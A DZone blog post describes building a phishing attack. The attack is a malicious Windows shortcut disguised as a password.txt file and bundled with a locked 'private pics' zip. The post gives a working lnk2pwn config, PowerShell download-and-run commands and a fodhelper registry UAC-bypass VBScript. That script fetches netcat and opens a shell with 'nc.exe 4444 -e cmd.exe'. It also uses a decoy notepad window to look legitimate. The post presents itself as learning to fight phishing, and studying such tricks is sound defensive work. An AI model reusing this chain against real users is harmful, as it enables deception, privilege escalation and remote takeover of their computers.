Over a million developers have joined DZone.

Pwned by a Shortcut

DZone's Guide to

Pwned by a Shortcut

Ever wondered how easy it is to make one of the fishy emails that deliver some type of malware to a system? This dev gives it a try as a way of learning how to fight it.

· Security Zone ·
Free Resource

Mobile is increasingly becoming a part of every consumers’ identity, but the increasing use of this digital channel is escalating the security risks faced by consumers and institutions.

No, this is not about some fancy exploit.

This is about an old and known trick that combines a few basic techniques and a lot of social engineering that's still getting users pwned by their curiosity (or whatever else).

The Context

A few weeks ago I had to recover some information about an old Microsoft “hotmail” account that I have. As I logged in to the email account I saw a huge number of emails from phishing campaigns that I was receiving.

I started looking at some of those emails trying to find some fancy stuff but all I got was fake websites (pretty badly written) and attached pdf, doc, and even zipped vbs files.

That got me thinking: Why would someone download and execute a really suspicious file from a really suspicious email?

So, I decided to write some form of “malware” on my own to understand why people are still hitting the “Run” button on suspicious files and also to convince myself that it’s not that hard to make someone execute your payload.

The Environment

The environment to reproduce this lab:

  • Linux (Host)

  • Python 2.7

  • wine

  • Windows 10 (Guest — VMWare, VirtualBox, etc.)

Round 1: The “Naive Plan”

At first glance, I thought about delivering a “fake .jpg” file. There are tons of tutorials about that.

The idea is pretty simple:

That failed miserably!

Windows Defender/SmartScreen caught 100% of all tries.

Round 2: Fighting Windows Defender/SmartScreen

If you already tried to drop some reverse shell payloads (.exe) on Windows 10 I guess you noticed that is not that trivial.

One of the things that the anti-phishing/malware component does is validate the code signing certificate. Basically, if your application does not have a valid certificate or a good “reputation” a big warning will show up every time that you try to execute it:

Image title

Although the user can still hit the “Run Anyway” button, that warning is enough to stop your payload from being executed by a “regular” user.

As described in the article “Hijacking Digital Signatures” from pentestlab.blog, you may have to put in some effort in order to bypass the SmartScreen without buying a certificate.

Round 3: Hello VBScript, My Old Friend

If it is not that trivial to drop a PE, is there anything else that could be simpler?

Yes, VBScript!

It may seem outdated and discontinued, but yet, Windows is still running VBScript smoothly.

Running a VBScript file does not make a lot of “noise” compared to an executable:

Image title

But, delivering a .vbs file sounds pretty bad. What else could be done?

Round 4: Shortcuts

One thing that could possibly get close to “legit” and convince someone to execute it is a shortcut file. Shortcut files in Windows do not show the “.lnk” file extension even when the “Hide extensions for known file types” folder viewing property is unchecked.

Image title

Image title

With that in mind, we could work on social engineering and deliver a malicious shortcut to the victim.

Round 5: Preparing the Attack

I wrote a small CLI tool called lnk2pwn to make the process of generating malicious shortcuts easier and I’m going to be using this tool to prepare the attack:

git clone https://github.com/tommelo/lnk2pwn

The CLI tool has a config.json file that represents a template of the attributes that will be generated in the shortcut. The tool also generates a VBScript to bypass the UAC.

To illustrate the attack that is going to be performed:

Image title

Configuring the commands and attributes for the shortcut:

    "shortcut": {
        "target_path": "C:\\Windows\\System32\\cmd.exe",
        "working_dir": "C:\\Windows\\System32",
        "arguments": "/c powershell.exe iwr -outf %tmp%\\p.vbs & %tmp%\\p.vbs",
        "icon_path": "C:\\Windows\\System32\\notepad.exe",
        "icon_index": null,
        "window_style": "MINIMIZED",
        "description": "TRUST ME",
        "fake_extension": ".txt",
        "file_name_prefix": "password"

    "elevated_uac": {
        "file_name": "uac_bypass.vbs",
        "cmd": "cmd.exe /c powershell.exe -nop -w hidden iwr -outf C:\\Windows\\System32\\nc.exe & C:\\Windows\\System32\\nc.exe 4444 -e cmd.exe"

Basically, we are registering two commands to be executed on the user’s behalf:

cmd.exe /c powershell.exe iwr -outf %tmp%\\p.vbs & %tmp%\\p.vbs

When the user runs the shortcut file, a VBScript (uac_bypass.vbs) is downloaded and executed. The script contains our second command:

cmd.exe /c powershell.exe -nop -w hidden iwr -outf C:\\Windows\\System32\\nc.exe & C:\\Windows\\System32\\nc.exe 4444 -e cmd.exe

This is going to be executed with administrative privileges without prompting the UAC screen.

Now, we just need to run the Python script to create the shortcut and the VBScript file:

python lnk2pwn.py -c config.json -o /var/www/html

As soon as the tool generates the .lnk and the .vbs files we are ready to deliver our fake shortcut.

Round 6: Social Engineering

The key point to this whole thing is social engineering. We need to put in some effort to convince someone to download and execute our “weird” file.

As an example, I could send a zipped file containing some “private pics” (password protected) and a “fake text” file containing the password to unzip those pictures:

zip --encrypt private_pics.zip pic1.jpg pic2.jpg

Also, we need to change the behavior of the generated VBScript to look “legit” and open up the notepad showing the password to unzip the content:

Const HKEY_CURRENT_USER = &H80000001

Const FodHelperPath           = "C:\\Windows\\System32\\fodhelper.exe"
Const RegKeyPathStr           = "SOFTWARE\\Classes\\ms-settings\\shell\\open\\command"
Const RegKeyPath              = "Software\\Classes\\ms-settings\\shell\\open\\command"
Const DelegateExecRegKeyName  = "DelegateExecute"
Const DelegateExecRegKeyValue = ""
Const DefaultRegKeyName       = ""
Const DefaultRegKeyValue      = "cmd.exe /c powershell.exe -nop -w hidden iwr -outf C:\Windows\System32\nc.exe & C:\Windows\System32\nc.exe 4444 -e cmd.exe"

Const RegObjectPath = "winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv"
Set Registry = GetObject(RegObjectPath)

Registry.CreateKey HKEY_CURRENT_USER, RegKeyPath
Registry.SetStringValue HKEY_CURRENT_USER, RegKeyPathStr, DelegateExecRegKeyName, DelegateExecRegKeyValue
Registry.SetStringValue HKEY_CURRENT_USER, RegKeyPathStr, DefaultRegKeyName, DefaultRegKeyValue

Set Shell = WScript.CreateObject("WScript.Shell")
Shell.Run FodHelperPath, 0, False

' Add to look legit!
Set Notepad = WScript.CreateObject("WScript.Shell")
Notepad.Run "C:\\Windows\\System32\\notepad.exe"

WScript.Sleep 1000

Notepad.SendKeys "Password: secure"

Compressing the final package:

zip evil.zip private_pics.zip password.txt.lnk

Round 7: Pwned by a Shortcut

Well, I thought it would be better recording a POC instead of taking some screenshots:


Shortcuts as Entry Points for Malware. https://www.phrozen.io/page/shortcuts-as-entry-points-for-malware-part-3

Hijacking Digital Signatures. https://pentestlab.blog/2017/11/06/hijacking-digital-signatures/

Fileless UAC Bypass. https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/

Hackers Illegally Purchasing Abused Code-signing & SSL Certificates From Underground Market. https://gbhackers.com/abused-code-signing/

Microsoft SmartScreen. https://en.wikipedia.org/wiki/Microsoft_SmartScreen

.LNK File Extension. https://fileinfo.com/extension/lnk

Explore the authentication advancements that are designed to secure accounts and payments—without overburdening consumers with a friction-laden experience.

malware ,infosec ,python ,security

Published at DZone with permission of

Opinions expressed by DZone contributors are their own.

{{ parent.title || parent.header.title}}

{{ parent.tldr }}

{{ parent.urlSource.name }}